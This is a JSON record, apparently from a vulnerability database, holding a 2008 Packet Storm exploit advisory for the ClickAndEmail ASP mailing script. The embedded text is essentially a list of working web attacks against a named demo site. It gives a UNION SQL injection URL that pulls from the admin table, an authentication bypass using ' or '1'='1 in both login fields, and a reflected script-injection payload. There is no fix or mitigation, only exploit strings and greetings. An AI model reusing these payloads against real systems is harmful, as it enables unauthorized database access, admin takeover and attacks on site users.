{"type": "packetstorm", "published": "2008-12-16T00:00:00", "reporter": "AlpHaNiX", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "6baeeb0ad1d200d41a99b5829e4a0641"}, {"key": "modified", "hash": "475448307c8e50d2ccc789815944f501"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "475448307c8e50d2ccc789815944f501"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8e2885b2bf625cc75a7f37c99082fe6f"}, {"key": "sourceData", "hash": "bddfad2b3c29f9de7e22ab7f189ba699"}, {"key": "sourceHref", "hash": "0a5d34ff0f957ba5c8ffd23542321132"}, {"key": "title", "hash": "b4066ba97a39c3208e8f01ab72166b24"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`########################################################################### \n#-------------------------------AlpHaNiX----------------------------------# \n########################################################################### \n \n#Found By : AlpHaNiX \n#website : www.offensivetrack.org \n#contact : AlpHa[AT]HACKER[DOT]BZ \n \n########################################################################### \n \n#script : ClickAndEmaiL \n#download : null \n#Demo : http://icash.ch/ClickAndEmailDEMO \n \n########################################################################### \n \n#Exploits : \n \n--=[SQL INJECTION]=-- \nhttp://icash.ch/ClickAndEmailDEMO/admin_dblayers.asp?action=update&tablename=Subscribers&redir=admin_subscribers.asp&ID=0+union+select+1,2,3,4,5,6,7+from+admin \n \n \n########################################################################## \n \n--=[AUTH BYPASS]=-- \n \nhttp://icash.ch/ClickAndEmailDEMO/admin_main.asp \n \nUSERNAME : ' or '1'='1 \nPASSWORD : ' or '1'='1 \n \n \n########################################################################## \n \n--=[Cross Site Scripting]=-- \n \nhttp://icash.ch/ClickAndEmailDEMO/admin_dblayers.asp?action=update&tablename=%22%3E%3Cscript%3Ealert(1);%3C/script%3E \n \n \n \n#Greetz For My Best Friend ZIGMA \n \n########################################################################### \n \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:27:07", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/73029/ClickAndEmail-SQL-Injection-XSS.html", "sourceHref": "https://packetstormsecurity.com/files/download/73029/clickemail-sqlxss.txt", "title": "ClickAndEmail SQL Injection / XSS", "enchantments": {"score": {"vector": "NONE", "value": 6.8}, "vulnersScore": 6.8}, "references": [], "id": "PACKETSTORM:73029", "hash": "78bebb90d631786d521a69224c6b7e1a8c9bf36be795cf11a9f52220b3d80b57", "edition": 1, "cvelist": [], "modified": "2008-12-16T00:00:00", "description": ""}

{}